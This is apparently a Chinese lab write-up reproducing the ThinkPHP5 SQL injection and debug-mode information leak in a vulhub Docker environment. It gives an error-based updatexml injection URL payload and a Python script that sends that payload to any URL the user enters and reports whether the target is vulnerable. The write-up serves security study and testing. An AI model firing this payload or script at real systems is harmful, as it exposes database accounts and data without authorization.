ThinkPHP5 SQL注入漏洞&&敏感信息泄露漏洞

1 漏洞介绍

ThinkPHP是在中国使用极为广泛的PHP开发框架。在其版本5.0(<5.1.23)中,开启debug模式,传入的某参数在绑定编译指令的时候又没有安全处理,预编译的时候导致SQL异常报错。然而thinkphp5默认开启debug模式,在漏洞环境下构造错误的SQL语法会泄漏数据库账户和密码

2 漏洞环境

复制代码
cd vulhub/thinkphp/in-sqlinjection/
部署环境
docker compose up -d
查看端口
docker compose ps

访问 ,您将看到显示用户名,表示环境正在成功运行。

http://192.168.135.132/index.php?ids[]=1&ids[]=2

3 使用payload进行复现

打开页面,你会发现消息显示成功:

http://192.168.135.132/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1

4 编写python脚本探测漏洞

复制代码
#!/usr/bin/env python
​
import requests
from urllib.parse import urljoin
​
def thinkphp5x_sql(url):
    payload = urljoin(url, '/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1')
​
    response = requests.get(url=payload, verify=False)
​
    if 'XPATH syntax error' in response.text:
        print("漏洞存在")
    else:
        print("漏洞不存在")
​
if __name__ == '__main__':
    print("注意:本代码仅用于实验和学习目的,请谨慎使用。")
    url = input("请输入目标 URL: ")
    thinkphp5x_sql(url)

结果

相关推荐
红树林077 小时前
渗透测试之sql注入--报错注入
数据库·sql·安全·web安全
Xudde.8 小时前
Quick2靶机渗透
笔记·学习·安全·web安全·php
岁岁的O泡奶9 小时前
DVWA_Vulnerability: Command Injection
经验分享·安全·web安全
AI绘画小3313 小时前
Web 安全核心真相:别太相信任何人!40 个漏洞挖掘实战清单,直接套用!
前端·数据库·测试工具·安全·web安全·网络安全·黑客
galaxylove14 小时前
Gartner发布2025年人工智能和网络安全技术成熟度曲线:网络安全领域对AI的期望值达到顶峰
人工智能·安全·web安全
pandarking14 小时前
[CTF]攻防世界:Lottery
web安全
galaxylove15 小时前
Gartner发布CISO人工智能安全指南:将AI安全治理融入所有网络安全治理体系
人工智能·安全·web安全
414a16 小时前
LingJing(灵境):Linux Amd64局域网设备访问靶机教程
linux·安全·web安全·网络安全·lingjing·灵境
独行soc1 天前
2025年渗透测试面试题总结-264(题目+回答)
网络·python·安全·web安全·网络安全·渗透测试·安全狮
YangYang9YangYan1 天前
网络安全专业职业能力认证发展路径指南
大数据·人工智能·安全·web安全